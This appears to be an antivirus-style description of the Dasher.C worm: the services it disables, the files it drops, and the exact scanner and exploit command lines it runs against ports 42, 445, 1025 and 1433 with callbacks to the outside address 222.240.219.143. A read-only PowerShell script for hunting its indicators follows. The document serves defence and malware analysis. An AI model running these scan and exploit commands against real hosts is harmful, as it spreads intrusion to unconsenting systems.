Worm:Win32/Dasher.C begins by terminating processes related to specific software firewalls, in addition to previously run instances of Worm:Win32/Dasher.C. These processes include:
Worm:Win32/Dasher.C then disables several Windows services by setting the registry value "Start" to 4 for the following registry keys:
- HKLM\SYSTEM\CurrentControlSet\Services\mousebm
- HKLM\SYSTEM\CurrentControlSet\Services\mousemm
- HKLM\SYSTEM\CurrentControlSet\Services\mousesync
- HKLM\SYSTEM\CurrentControlSet\Services\ssl
- HKLM\SYSTEM\CurrentControlSet\Services\wpa
- HKLM\SYSTEM\CurrentControlSet\Services\wupnp
- HKLM\SYSTEM\CurrentControlSet\Services\wudpcom
- HKLM\SYSTEM\CurrentControlSet\Services\MSDTC
- HKLM\SYSTEM\CurrentControlSet\Services\rpcsvc
It also sets the SMB service to start at boot-time by setting the registry value "SMBDeviceEnabled" to 0 in HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters.
After this, Worm:Win32/Dasher.C deletes the following files:
- <system dir>\wins\Sqltob.exe
- <system dir>\wins\SqlScan.exe
- <system dir>\wins\SqlExp.exe
- <system dir>\wins\SqlExp1.exe
- <system dir>\wins\SqlExp2.exe
- <system dir>\wins\SqlExp3.exe
and drops the following files:
- <system dir>\wins\Sqltob.exe (detected as Worm:Win32/Dasher.C)
- <system dir>\wins\SqlScan.exe (detected as Tool:Win32/Tcpportscan.C)
- <system dir>\wins\SqlExp.exe (detected as Exploit:Win32/MS04-045)
- <system dir>\wins\SqlExp1.exe (detected as Exploit:Win32/MS05-039)
- <system dir>\wins\SqlExp2.exe (detected as Exploit:Win32/MS05-051)
- <system dir>\wins\SqlExp3.exe (detected as Exploit:Win32/MS02-056)
It then deletes the registry value "Windows Update" under the key Software\Microsoft\Windows\CurrentVersion\Run.
It then tries to execute <system dir>\wins\Sqltob.exe, and if successful, Worm:Win32/Dasher.C tries to delete itself.
Sqltob.exe performs the following actions in an infinite loop:
Deletes the following files:
- <system dir>\wins\Result.txt
- <system dir>\wins\42.txt
- <system dir>\wins\445.txt
- <system dir>\wins\1025.txt
- <system dir>\wins\1433.txt
Executes one of the following, randomly, to scan random IP addresses for computers listening on ports 42, 445, 1025, or 1433:
- <system dir>\wins\SqlScan.exe SYN <random>.0.0.1 <random>.10.255.255 42,445,1025,1433 /Save
- <system dir>\wins\SqlScan.exe SYN <random>.245.0.1 <random>.255.255.255 42,445,1025,1433 /Save
- <system dir>\wins\SqlScan.exe SYN <random>.<random>.0.1 <random>.<random>.255.255 42,445,1025,1433 /Save
Sqltob.exe then parses the scan results from SqlScan.exe and runs the following remote exploits to attempt to execute shellcode on remote vulnerable computers:
For IP addresses found listening on port 42, it executes:
- SqlExp.exe -r 222.240.219.143 -p 53 -o 0 -t <target IP address>
For IP addresses found listening on port 445, it executes:
- SqlExp1.exe <target IP address> 222.240.219.143 53 0
- SqlExp1.exe <target IP address> 222.240.219.143 53 1
For IP addresses found listening on port 1025, it executes:
- SqlExp2.exe <target IP address> 1025 222.240.219.143 53 0
- SqlExp2.exe <target IP address> 1025 222.240.219.143 53 1
For IP addresses found listening on port 1433, it executes:
- SqlExp3.exe <target IP address> 1433 222.240.219.143 53
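As an added example (not part of the original description), the following read-only PowerShell check looks for the host indicators described above: the services set to Start=4, the SMBDeviceEnabled value, the dropped and scan-result files, running dropped components, and live connections to the 222.240.219.143:53 address passed to the exploit tools. It assumes <system dir> is %SystemRoot%\System32 and that Get-NetTCPConnection is available (Windows 8 / Server 2012 or later).

```powershell
# Added example: hunt for Worm:Win32/Dasher.C indicators on the local host.
# Reports findings only; it changes nothing. Run from an elevated prompt.
$services = 'mousebm','mousemm','mousesync','ssl','wpa','wupnp','wudpcom','MSDTC','rpcsvc'
$files    = 'Sqltob.exe','SqlScan.exe','SqlExp.exe','SqlExp1.exe','SqlExp2.exe','SqlExp3.exe',
            'Result.txt','42.txt','445.txt','1025.txt','1433.txt'
# Assumption: <system dir> in the description is %SystemRoot%\System32
$winsDir  = Join-Path $env:SystemRoot 'System32\wins'
$findings = @()

# 1. Services the worm disables by setting Start = 4. MSDTC is a legitimate
#    service, so this hit alone is weak; correlate it with the file/process hits.
foreach ($svc in $services) {
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
    if (Test-Path $key) {
        $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
        if ($start -eq 4) { $findings += "Service '$svc' has Start=4 (disabled)" }
    }
}

# 2. SMBDeviceEnabled = 0 under NetBT\Parameters
$netbt = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'
$smb = (Get-ItemProperty -Path $netbt -Name SMBDeviceEnabled -ErrorAction SilentlyContinue).SMBDeviceEnabled
if ($smb -eq 0) { $findings += "NetBT\Parameters\SMBDeviceEnabled = 0" }

# 3. Dropped components and SqlScan.exe result files in <system dir>\wins
foreach ($f in $files) {
    $p = Join-Path $winsDir $f
    if (Test-Path $p) { $findings += "File present: $p" }
}

# 4. Dropped components currently running
Get-Process -Name Sqltob,SqlScan,SqlExp,SqlExp1,SqlExp2,SqlExp3 -ErrorAction SilentlyContinue |
    ForEach-Object { $findings += "Process running: $($_.ProcessName) (PID $($_.Id))" }

# 5. Live TCP connections to the address/port handed to the exploit tools
$conns = Get-NetTCPConnection -RemoteAddress '222.240.219.143' -RemotePort 53 -ErrorAction SilentlyContinue
foreach ($c in $conns) {
    $findings += "Connection to 222.240.219.143:53 from PID $($c.OwningProcess) ($($c.State))"
}

if ($findings.Count -eq 0) { 'No Worm:Win32/Dasher.C indicators found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Outbound SYN bursts to ports 42, 445, 1025 and 1433 across random address ranges, as produced by the SqlScan.exe invocations above, are the corresponding network-side indicator to watch for on the perimeter.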